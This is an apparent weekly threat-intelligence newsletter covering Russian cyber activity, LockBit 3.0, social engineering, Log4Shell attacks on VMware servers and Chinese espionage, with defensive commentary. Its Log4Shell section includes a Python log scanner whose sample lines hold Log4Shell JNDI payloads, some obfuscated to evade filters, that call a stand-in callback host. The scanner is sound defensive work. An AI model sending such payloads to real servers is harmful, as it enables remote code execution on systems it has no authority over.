TRIAGE - Threat Reporting and Intelligence on Attacks and General Exploits #25
James Beal
Security Architect and Threat Intelligence Researcher, Aeterneus Intel Founder. TRIAGE'ing the evolving threat landscape to help Infosec Teams and Execs keep their organizations safe!
Howdy everyone, welcome to volume number 25 of TRIAGE Tuesday! First we look at the outward effects of the Russia/Ukraine conflict on other parts of the world, plus a great overview of general Russian hacking activity. LockBit has come out with their latest version, with a focus on a more corporate start-up style system that includes a bug bounty program and some very large payouts! We pivot to email, a constant attack vector, and Proofpoint’s latest research into the on-going issues with attacks still getting through to end users. CISA dropped a warning that Log4Shell is still being exploited on VMware systems, which also serves as a perfect example of why patching still needs to be a fundamental priority for everyone: this vulnerability is now over six months old and no internet-exposed systems should still remain unpatched. We finish off the week with a look at more hacker attacks out of China, with their newest tactical choice to use ransomware to hide cyberespionage! Enjoy a closer look at all 5 stories below!
If you are not already, get this awesome weekly update delivered directly to your inbox! The newsletter!
1. Lithuanian Government Issues DDoS Attack Alerts and Overview of Russian GRU and SVR Cyberespionage Campaigns 1H 2022
Overview:
1st link: Lithuania's National Cyber Security Center has warned of increasing distributed denial-of-service attacks directed against the nation's public authorities and its transport and financial sectors, which could lead to temporary service disruptions. A Telegram post attributes the DDoS attacks to a group called Cyber Spetsnaz, saying they are possibly retaliation for Lithuania's alleged blocking of vital supplies by road and rail from the Russian enclave of Kaliningrad. On Monday June 28, Reuters reported that the Russian Killnet group claimed responsibility for a DDoS attack on Lithuania.
2nd link: On 24 February 2022, Russia invaded Ukraine, and these two well-known APT groups (among many others) have been busy launching widespread intelligence gathering intrusion campaigns to support the Russian government and Russian military. This blog aims to leverage open source intelligence (OSINT) reports to highlight the recent publicly-known tactics, techniques, and procedures (TTPs) leveraged by these cyber adversaries in 1H 2022 and the significance of them. For many top enterprises, government organizations, and political entities, these hacking groups operating on behalf of the Russian GRU and SVR are priority threats whose capabilities are of the utmost concern.
TRIAGE: As we continue to see the effects of the Russia/Ukraine conflict spread, a conflict that still dominates the world news and so far shows no real sign of ending, here we have two articles covering aspects of the repercussions. First we have news that DDoS attacks are being launched against a third party, in this case Lithuania, over the country’s response to Russian aggression. The second article is a very well written overview of Russia’s two main intelligence organizations and their activity in the cyber realm over the first half of 2022. As we all try to keep up with events and protect ourselves and our organizations from harm, these again serve as detailed examples of the activity you should expect from nation state backed attack groups.
2. LockBit adds a bug bounty program in its revamped ransomware-as-a-service operation
Overview: The highly active LockBit ransomware group released what it is calling “LockBit 3.0” over the weekend, and announced a bug bounty program that offers rewards for ways to improve the ransomware operation. Cybersecurity researchers have tracked a surge in LockBit activity over the last several months, and the group is poised to overtake Conti as the most prolific ransomware group in terms of publicly identified victims. Recent incidents attributed to the group include attacks on a Foxconn factory, a Canadian fighter jet training company, and a popular German library service. Although few details were provided about technical changes to the ransomware-as-a-service operation, the group said it was inviting all security researchers and hackers to participate in its bug bounty program, which allegedly offers rewards ranging from $1,000 to $1 million. The group is seeking website bugs, locker errors, and ideas to improve the group’s software, among other things. A $1 million bounty is reserved for discovering the true name of the affiliate program manager, known as LockBitSupp.
TRIAGE: If anyone was still wondering how commercialized and “professional” these APT and ransomware groups were going to get, here we go with the latest example of a move to formalize these criminal organizations into a format that does not look much different than a new startup out of Israel or Silicon Valley in the U.S. The joke was made in an online infosec group chat earlier today, while discussing this story, that all they are really missing at this point is a look at their benefits package and finding out the 401k disbursements. We have seen previous attempts to normalize and portray this work as legitimate, and here is another step towards that end as well. I doubt anyone reading this would ever actually consider it, but this does also serve as a good reminder, in case you see it being discussed anywhere else, that participating in anything like this bug bounty program is still a felony level crime, and putting any faith or trust into getting paid by a criminal group is a silly notion by itself.
3. Proofpoint: Social engineering attacks slipping past users
Overview: Some of the most effective tricks used for social engineering attacks are being overlooked or underestimated. That's according to security vendor Proofpoint, whose 2022 Social Engineering report concluded that many companies mistakenly assume that cybercriminals are unwilling or unable to use tactics such as extended conversations, legitimate services and hijacked email threads in order to dupe their targets into opening malware and following phishing links.
TRIAGE: This article serves as a great reminder to discuss these kinds of topics with co-workers, with anyone in management at your organization who could be targeted, and also with the general public of your family and friends. Those of us in the trenches each and every day can get jaded on these subjects and think everyone already hears too much about them, but this is a perfect example of how these attacks continue to happen: security begins and ends with all users, and no amount of advanced security tooling is going to stop 100% of everything, twenty-four hours a day, every day. The more users know about techniques, the more aware they can be, which can mean the difference between a casual “who cares, I click on everything” and the split second “ok, now this looks suspicious” that is the difference between a normal day and a very bad day of incident response discussions.
4. CISA: Log4Shell exploits still being used to hack VMware servers
Overview: CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability. Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data. After its disclosure in December 2021, multiple threat actors began scanning for and exploiting unpatched systems, including state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as several access brokers commonly used by ransomware gangs.
TRIAGE: Patching. It is still one of the fundamentals that does not get performed as often as it should, or as fast as it should, for general vulnerabilities, let alone for something that can have a horrible impact on your entire organization like Log4Shell can if it is not corrected on any internet exposed systems. Here we have confirmation from CISA that multiple nation state hacking groups are using this exact vulnerability against a very popular target that exists in a very large number of organizations worldwide. Hopefully most of those orgs have now patched, as they have had over six months to track down and patch or isolate these machines, but if you still have any exposed systems, at this point you should consider them pwned: they need to be treated as hostile, not just patched before the sys admins move on.
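Treating an exposed server as compromised starts with checking what actually hit it. The script below is an added example, not code from the article or from CISA: it scans web-server access log lines for Log4Shell-style JNDI lookup strings, including the nested `${lower:...}` and `${::-x}` lookup variants that defeat a naive substring match, and reports the line, the lookup scheme and the callback target so an analyst can pivot to network logs. The log lines and the `callback.example` host name are constructed for the example; the nested-lookup resolution handles only the lookup forms listed in the comments.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not from the article). Lines 2-4 carry a
# Log4Shell-style lookup in the User-Agent or query string, 1 and 5 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jul/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"
10.0.0.9 - - [01/Jul/2022:10:01:09 +0000] "GET /portal/?x=${${lower:j}ndi:${lower:l}dap://callback.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.9 - - [01/Jul/2022:10:01:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://callback.example/c}"
10.0.0.7 - - [01/Jul/2022:10:02:00 +0000] "POST /broker/xml HTTP/1.1" 200 88 "-" "VMware Horizon Client/8.0"
"""

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>:<target>}
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):(?P<target>[^}]*)\}", re.IGNORECASE)


def _resolve(m: "re.Match") -> str:
    """Evaluate one innermost lookup the way log4j 2.x would, for the forms we know."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)            # keep the JNDI lookup intact for the detector
    if low.startswith("lower:"):
        return body[6:].lower()       # ${lower:J} -> j
    if low.startswith("upper:"):
        return body[6:].upper()       # ${upper:j} -> J
    if ":-" in body:
        return body.rsplit(":-", 1)[1]  # ${::-j} and ${env:UNSET:-j} -> j (default value)
    return m.group(0)                 # unknown lookup type: leave it alone


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per line that contains a JNDI lookup after normalization."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append({
                "line": n,
                "scheme": m.group("scheme").lower(),
                "target": m.group("target"),
                "raw": line,
            })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG.splitlines()):
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['target']}")
```

A hit means only that a lookup string reached the logged request, not that it was evaluated; confirm by looking for outbound LDAP, RMI or DNS connections from the host to the reported target around the same timestamp.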
5. Chinese hackers use ransomware as decoy for cyber espionage
Overview: Two Chinese hacking groups conducting cyber espionage and stealing intellectual property from Japanese and western companies are deploying ransomware as a decoy to cover up their malicious activities. Threat analysts from Secureworks say that the use of ransomware in espionage operations is done to obscure their tracks, make attribution harder, and create a powerful distraction for defenders. Finally, the exfiltration of the sensitive information is masked as financially-motivated attacks, which isn't the case with Chinese government-sponsored threat groups.
TRIAGE: This is a good overview of the behavior; please also take a look at the link included in the article to the actual Secureworks report, which lists all the technical details behind these attacks. We have discussed recently the uptick in activity researchers are finding coming out of China this year, compared to the last several years where things have been rather quiet from official China backed APT groups. Here is another dangerous example where they are abusing the popular attack method of the week, ransomware, as a decoy cover for their actual intended target: data for espionage purposes. Any company with intellectual property that would help China skip years of research and development should have tools and people in place to defend against these exact types of attacks.